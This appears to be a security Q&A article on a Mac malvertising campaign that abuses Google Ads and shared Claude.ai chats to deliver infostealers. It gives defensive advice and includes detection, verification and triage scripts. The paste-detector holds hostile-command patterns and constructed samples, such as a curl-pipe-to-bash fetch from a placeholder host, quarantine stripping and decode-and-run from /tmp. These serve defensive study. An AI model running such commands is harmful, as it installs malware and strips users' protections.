Mac Malware Campaign Exploits Google Ads and Claude AI Shared Conversations
Cybercriminals have devised a cunning malvertising campaign that targets Mac users searching for the popular AI assistant Claude. By abusing Google Ads and legitimate shared chats on Claude.ai, attackers trick users into downloading and executing malicious software. This Q&A breaks down the scheme, its risks, and how to stay safe.
1. How are cybercriminals using Google Ads to target Mac users searching for Claude?
Attackers buy Google Ads that appear for searches such as “Claude mac download.” The sponsored result shows a display URL that resembles the legitimate Claude.ai site, but clicking it leads to a look-alike landing page rather than to Claude’s site. That page walks the user through a series of steps, such as downloading a file or copying commands into the Mac Terminal, whose end goal is to get malware installed under the guise of the official Claude app. Because the ad is served by Google and sits above the organic results, users extend the trust they place in the search page to the ad itself and rarely inspect where it actually goes.

2. What role do legitimate Claude.ai shared chats play in this malvertising scheme?
To lend authenticity to the attack, the fake landing page embeds or links to a real shared conversation hosted on Claude.ai. Attackers create these shared conversations from a legitimate Claude account and word them as support instructions for installing the desktop app. When victims see that the chat is hosted on Claude’s real domain (claude.ai/share/...), they are more likely to trust the steps. This abuse of a legitimate feature makes the scam harder to detect: URL-reputation and antivirus checks will not flag the chat link, because the page it points to is Anthropic’s own and contains nothing but text. The chat content then guides the victim through the installation, typically telling them to run Terminal commands or to install a supposed “update.”
3. What steps do victims follow after clicking the sponsored ad, and where does the malware come in?
After clicking the ad, the user lands on a page that imitates Claude’s official site. It offers a button or prompt to download the Mac version of Claude. Clicking it either downloads a .dmg file containing the malware or leads to a page of step-by-step instructions. In some cases the instructions tell the user to open Terminal and run a one-line command that fetches a script from a remote server and executes it; that script may download further payloads or install a backdoor, keylogger, or adware. The two routes deal with Gatekeeper differently: a .dmg payload is typically signed with a valid developer certificate so that Gatekeeper raises no objection, while a script fetched by curl and run from Terminal is never assessed by Gatekeeper at all, because only files saved by a browser or similar application carry the quarantine attribute that triggers the check. Once running, the malware can steal credentials, cryptocurrency wallets, or other sensitive data.
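The “paste this into Terminal” step is the one worth checking mechanically before anything runs. The script below is an added example for this article, not code from the campaign or from any vendor: it scores a pasted snippet against the tricks described above (fetch-and-execute pipes, quarantine stripping, fake password prompts) and a few common companions, then runs over constructed samples. The indicator list, the BLOCK/REVIEW/OK thresholds and the example.invalid hostname are assumptions made for this example.

```sh
#!/bin/sh
# Triage a "copy this into Terminal" snippet before running it. Added example
# for this article, not code from the campaign or from any vendor. The
# indicator list is an assumption: it covers the tricks the text describes
# (fetch-and-execute, quarantine stripping, fake password prompts) plus a few
# common companions, not every variant an attacker could write.

# Print one indicator name per line for every pattern the snippet matches.
paste_indicators() {
    snippet=$1
    # _m PATTERN NAME: print NAME if the snippet matches PATTERN (ERE, case-insensitive).
    _m() { printf '%s\n' "$snippet" | grep -Eiq -- "$1" && printf '%s\n' "$2"; }
    _m '(curl|wget)[^|]*\|[[:space:]]*(sudo[[:space:]]+)?(ba|z)?sh([[:space:]]|$)'      fetch_piped_to_shell
    _m '(ba|z)?sh[[:space:]]+-c[[:space:]]+.?\$\((curl|wget)'                          fetch_eval
    _m 'base64[[:space:]]+(-d|-D|--decode)'                                            base64_stage
    _m 'xattr[[:space:]]+(-[a-z]*d[a-z]*[[:space:]]+com\.apple\.quarantine|-[a-z]*c)'  quarantine_strip
    _m 'osascript.*display[[:space:]]+dialog.*hidden[[:space:]]+answer'                password_prompt
    _m 'spctl[[:space:]]+--(master|global)-disable'                                    gatekeeper_disable
    _m 'chmod[[:space:]]+[^[:space:]]+[[:space:]]+.*(/tmp|/var/tmp|/private/tmp)'      exec_from_tmp
    _m '(^|[[:space:]])(nohup|disown)([[:space:]]|$)|[^&]&[[:space:]]*$'              backgrounded
    true
}

# Reduce the indicators to a decision. Fetch-and-execute, quarantine stripping,
# Gatekeeper disabling and a fake password prompt have no place in a
# "download our app" instruction, so they block outright; the rest need a human.
classify_paste() {
    inds=$(paste_indicators "$1")
    case "$inds" in
        *fetch_piped_to_shell*|*fetch_eval*|*quarantine_strip*|*password_prompt*|*gatekeeper_disable*)
            echo BLOCK ;;
        '') echo OK ;;
        *)  echo REVIEW ;;
    esac
}

# Constructed samples (not real campaign commands); example.invalid is a
# reserved name that never resolves.
for s in \
    'curl -fsSL https://example.invalid/claude-setup.sh | bash' \
    'xattr -d com.apple.quarantine ~/Downloads/Claude.dmg && open ~/Downloads/Claude.dmg' \
    'echo aGVsbG8= | base64 -d > /tmp/x && chmod +x /tmp/x && /tmp/x' \
    'brew install --cask some-app'
do
    printf '%-7s %s\n' "$(classify_paste "$s")" "$s"
done
```

The decode-to-/tmp-then-execute sample only reaches REVIEW under these thresholds; whether that should be BLOCK is a policy choice, which is why the two functions are kept separate: paste_indicators reports what it saw, classify_paste decides.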
4. Which types of malware are being delivered through this campaign?
Security researchers have observed the campaign delivering a mix of malware. One common payload is a variant of the Realst infostealer, which targets browser credentials, cryptocurrency wallets, and password-manager data. Other reports describe Atomic macOS Stealer (AMOS), a well-known Mac stealer that exfiltrates sensitive files and keychain entries. Some runs of the campaign push adware such as SearchAwesome or Pirrit, which hijack browser settings and flood the user with advertisements. In more advanced cases the attacker uses the initial foothold to drop a remote access trojan (RAT) for persistent control of the machine. The payloads are usually obfuscated and packed to evade signature-based antivirus tools.
5. How can Mac users protect themselves from such malvertising attacks?
Do not click a sponsored result for “Claude mac download”; type claude.ai into the address bar instead, and check the actual destination domain of any paid ad before clicking (hover over it, or look at the URL bar once the page loads). Use an ad blocker or a security extension that blocks known malvertising. Never paste Terminal commands from a website unless you understand every part of them; “curl … | bash” one-liners in particular are not a normal way to install a desktop app. Keep macOS, your browser, and endpoint protection updated. Consider a filtering DNS resolver such as Quad9 or NextDNS to block known malicious domains. If you do download an installer, verify who signed it from Terminal with codesign -dv --verbose=4 and spctl --assess --type execute -vv, and compare the Team ID with one you trust: a valid Developer ID signature only proves that someone obtained a certificate from Apple, not that the app is the vendor’s, and the Open Anyway button in System Settings > Privacy & Security does not tell you who signed the app. Lastly, watch for signs of infection: slow performance, new auto-launching apps, unfamiliar items under ~/Library/LaunchAgents, or unexpected network traffic.
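Here is what verifying a download looks like in practice. The script below is an added example for this article, not Anthropic’s or Apple’s code: it runs Apple’s own codesign, spctl and xattr tools against an .app bundle, parses their output, and passes only when Gatekeeper accepted a notarized build and the Team ID matches the one you expect. The placeholder Team ID and the Example Corp names are assumptions, not Anthropic’s real values; run it against the .app copied out of the .dmg, not against the .dmg itself.

```sh
#!/bin/sh
# Verify a downloaded Mac app before opening it. Added example for this
# article, not Anthropic's or Apple's code. Run it against the .app bundle
# (copy it out of the .dmg first), not against the .dmg itself. Replace
# EXPECTED_TEAM_ID with the Team ID you read from a copy of the app obtained
# from the vendor's own site; the value below is a placeholder, not
# Anthropic's real Team ID.
EXPECTED_TEAM_ID=${EXPECTED_TEAM_ID:-REPLACEME00}

# Parse `codesign -dv --verbose=4` output (read from stdin; codesign writes it
# to stderr) and print the TeamIdentifier. Prints nothing for an unsigned or
# ad-hoc signed binary, which report no such line or "TeamIdentifier=not set".
team_id_from_codesign() {
    sed -n 's/^TeamIdentifier=//p' | grep -Ev '^(not set)?$' || true
}

# Parse `spctl --assess --type execute -vv` output from stdin. Gatekeeper can
# accept an app that is Developer ID signed but not notarized, so report that
# separately: "accepted", "accepted-unnotarized" or "rejected".
gatekeeper_verdict() {
    out=$(cat)
    case "$out" in
        *': accepted'*)
            case "$out" in
                *'source=Notarized Developer ID'*) echo accepted ;;
                *) echo accepted-unnotarized ;;
            esac ;;
        *) echo rejected ;;
    esac
}

# Pure decision: PASS only when Gatekeeper accepted a notarized build AND the
# Team ID is the expected one. A valid signature from some other developer
# passes Gatekeeper just fine; only the Team ID comparison catches that.
verify_decision() {
    verdict=$1 team=$2 expected=$3
    if [ "$verdict" != accepted ]; then echo "FAIL gatekeeper=$verdict"; return 1; fi
    if [ -z "$team" ]; then echo "FAIL no-team-id"; return 1; fi
    if [ "$team" != "$expected" ]; then echo "FAIL team=$team expected=$expected"; return 1; fi
    echo PASS
}

# Run the macOS tools against a bundle and decide.
verify_app() {
    app=$1
    # A browser download carries com.apple.quarantine, which is what makes
    # Gatekeeper look at the file at all; a curl/terminal fetch does not.
    if ! xattr -p com.apple.quarantine "$app" >/dev/null 2>&1; then
        echo "WARN: no quarantine attribute on $app (not a browser download; Gatekeeper never assessed it)"
    fi
    verdict=$(spctl --assess --type execute -vv "$app" 2>&1 | gatekeeper_verdict)
    team=$(codesign -dv --verbose=4 "$app" 2>&1 | team_id_from_codesign)
    verify_decision "$verdict" "$team" "$EXPECTED_TEAM_ID"
}

if [ $# -eq 1 ]; then
    verify_app "$1"
fi
```

Usage: EXPECTED_TEAM_ID=XXXXXXXXXX sh verify_app.sh /Applications/Claude.app. To learn the Team ID to pin, run codesign -dv --verbose=4 once against a copy you obtained directly from Anthropic’s site and keep the TeamIdentifier it prints; the parsers above are split out from the tool invocations so they can be exercised with recorded output on any system.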

6. Why are legitimate AI tools like Claude being exploited for malware distribution?
AI platforms have grown explosively, and many users want a desktop client rather than a browser tab. Attackers exploit that demand: a user searching “Claude mac download” expects an installer, and the paid ad sitting above the organic results is the first thing they see. The shared chat on Claude.ai then provides a strong social-engineering hook: victims see a real claude.ai URL and drop their guard. The hype around AI tools also means users are less cautious than they would be when downloading, say, a PDF reader. Finally, Google Ads’ pay-per-click model delivers traffic immediately, and attackers can rotate ads and landing domains faster than Google’s review removes them, making this a low-risk, high-reward tactic.
7. What should you do if you suspect you have fallen victim to this campaign?
If you clicked a Google ad for Claude and later installed or ran something from it, act immediately. Disconnect the Mac from the internet to stop further exfiltration. Run a full scan with reputable Mac security software such as Malwarebytes or Sophos Home. Review installed applications and remove any you do not recognize, and check the launchd persistence directories (~/Library/LaunchAgents, /Library/LaunchAgents, /Library/LaunchDaemons) for unfamiliar items. Use Activity Monitor to look for suspicious processes consuming CPU or network. Review your browser for unrecognized extensions and remove them. From a different, clean device, change the passwords for all important accounts (email, banking, cryptocurrency), starting with anything stored in the browser or keychain on the affected Mac, and enable two-factor authentication wherever possible. If a stealer or backdoor ran, an erase-and-reinstall or a restore from a backup taken before the incident is more reliable than piecemeal cleanup. Finally, report the ad to Google so it can be taken down and other users warned.
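A first-pass triage of the points above can be scripted so nothing is overlooked under pressure. The script below is an added example for this article, not vendor code: it lists non-Apple launchd jobs, recently changed launchd items with the program they run, login items, recently added apps with their signer, and recent downloads with the application that quarantined them. It removes nothing. The seven-day window and the com.example labels in its checks are assumptions; third-party software uses these locations legitimately, so the output is something to read, not a kill list.

```sh
#!/bin/sh
# First-pass triage of a Mac that may have run a malicious installer. Added
# example for this article, not vendor code; it only lists things and removes
# nothing. The directories below are macOS's standard launchd persistence
# locations; legitimate third-party software uses them too.

# Filter `launchctl list` output (tab-separated: PID, Status, Label) down to
# jobs whose label is not Apple's own.
non_apple_jobs() {
    awk -F '\t' 'NR > 1 && $3 !~ /^com\.apple\./ { print $3 }'
}

# launchd property lists in the user and system persistence directories that
# changed in the last N days (default 7), with the command each one runs.
recent_launch_items() {
    days=${1:-7}
    for d in "$HOME/Library/LaunchAgents" /Library/LaunchAgents /Library/LaunchDaemons; do
        [ -d "$d" ] || continue
        find "$d" -name '*.plist' -mtime "-$days" 2>/dev/null | while read -r plist; do
            printf '== %s\n' "$plist"
            # plutil -p prints the plist readably; Program/ProgramArguments is
            # what launchd will execute, RunAtLoad whether it starts at login.
            plutil -p "$plist" 2>/dev/null | grep -E '"(Label|Program|ProgramArguments|RunAtLoad)"|^ +[0-9]+ => '
        done
    done
}

# Apps added to /Applications or ~/Applications in the last N days, with the
# first Authority line of their signature ("unsigned" when codesign has none).
recent_apps() {
    days=${1:-7}
    for d in /Applications "$HOME/Applications"; do
        [ -d "$d" ] || continue
        find "$d" -maxdepth 1 -name '*.app' -mtime "-$days" 2>/dev/null | while read -r app; do
            signer=$(codesign -dv --verbose=4 "$app" 2>&1 | sed -n 's/^Authority=//p' | head -n 1)
            printf '%s\t%s\n' "$app" "${signer:-unsigned}"
        done
    done
}

# Recent files in ~/Downloads and which application quarantined them; the
# third field of com.apple.quarantine names the downloading app, and a file
# with no attribute at all did not arrive through a browser.
recent_downloads() {
    days=${1:-7}
    [ -d "$HOME/Downloads" ] || return 0
    find "$HOME/Downloads" -maxdepth 1 -type f -mtime "-$days" 2>/dev/null | while read -r f; do
        agent=$(xattr -p com.apple.quarantine "$f" 2>/dev/null | cut -d ';' -f 3)
        printf '%s\t%s\n' "$f" "${agent:-no-quarantine}"
    done
}

triage() {
    echo '# non-Apple launchd jobs for this user'
    launchctl list | non_apple_jobs
    echo '# launchd items modified in the last 7 days'
    recent_launch_items 7
    echo '# login items'
    osascript -e 'tell application "System Events" to get the name of every login item'
    echo '# apps added in the last 7 days (path<TAB>signer)'
    recent_apps 7
    echo '# recent downloads (path<TAB>quarantining app)'
    recent_downloads 7
}

# Only run the full triage where the macOS tools exist.
if command -v launchctl >/dev/null 2>&1; then
    triage
fi
```

Run it as sh triage.sh from the affected user’s account; launchctl list only shows that user’s jobs, so repeat sudo launchctl list | non_apple_jobs for the system domain. Anything whose ProgramArguments fetch from a URL, run from /tmp or /Users/Shared, or carry a signer you do not recognize is what to pull for closer analysis.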